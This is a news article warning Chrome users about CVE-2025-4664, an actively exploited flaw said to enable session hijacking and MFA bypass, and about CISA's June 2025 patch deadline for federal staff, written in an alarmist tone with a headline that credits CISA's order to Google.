Google orders all Chrome users to update within 21 days or stop using browser to avoid attacks

Google has sounded a chilling alarm for the estimated two billion Chrome users worldwide: update your google chrome browser immediately—or stop using it entirely. A critical security flaw, known as CVE-2025-4664, has emerged, allowing hackers to steal login credentials and bypass multi-factor authentication (MFA), leaving user accounts perilously exposed.

The United States Cybersecurity and Infrastructure Security Agency (CISA) has mandated all federal employees to apply Google’s patch by June 5, 2025. The warning is unequivocal: update your Chrome browser within 21 days or cease its use until patched. While the formal directive targets US government staff, the agency urges all organisations—and home users—to act swiftly to protect themselves.

This flaw is particularly alarming due to its method of exploitation. A security researcher revealed that attackers could manipulate a little-known vulnerability in Chrome’s OAuth authentication flow. By hijacking specific query parameters containing security session credentials, hackers can effectively clone secure sessions, granting them unfettered access to users’ accounts without triggering MFA protections.

This vulnerability’s presence in the wild—meaning active exploitation by cybercriminals—has propelled Google into a rapid response, releasing a fix immediately after reports surfaced. However, the existence of “proof of concept” code and public knowledge means the threat window is at its widest, with attackers racing to exploit users before patches are applied.

Chrome’s staggering global market share makes this flaw particularly dangerous. Two billion users, ranging from casual browsers to enterprise professionals, rely on the browser for sensitive online activity, from banking and email to business-critical communications. The attack bypasses even robust security setups, eroding trust in one of the internet’s foundational tools.

CISA’s guidance is crystal clear: if your organisation or personal device cannot apply the patch, you must discontinue using Chrome altogether. Alternatives should be considered temporarily to avoid falling victim to account takeovers and potential data breaches.

Beyond government and enterprise sectors, everyday users face the same risks. The vulnerability enables attackers to silently take over accounts, quietly steal data, or worse—launch further targeted attacks under the guise of the victim’s identity.

This incident underscores the relentless battle between cybersecurity defenders and threat actors. Even major software companies like Google can fall prey to vulnerabilities that emerge in complex codebases millions rely on daily.

The 21-day deadline is tight, but necessary. Users should prioritise updating Chrome immediately—via official sources or browser auto-update features—to ensure they benefit from the patch. Delays in updating only widen the window for malicious actors to exploit the flaw.

In the meantime, users are advised to remain vigilant. Unusual login alerts, unexpected account activity, or odd browser behaviour should be reported and investigated promptly. Multi-factor authentication, while bypassed here, remains essential as part of layered security, as it protects against many other types of attacks.

This crisis also highlights the growing importance of government agencies like CISA in cybersecurity governance, enforcing mandates that protect national security and private citizens alike from increasingly sophisticated cyber threats.

In short, the message is stark: Chrome users have 21 days to update or risk catastrophic account compromises. This threat is real, urgent, and indiscriminate. The clock is ticking.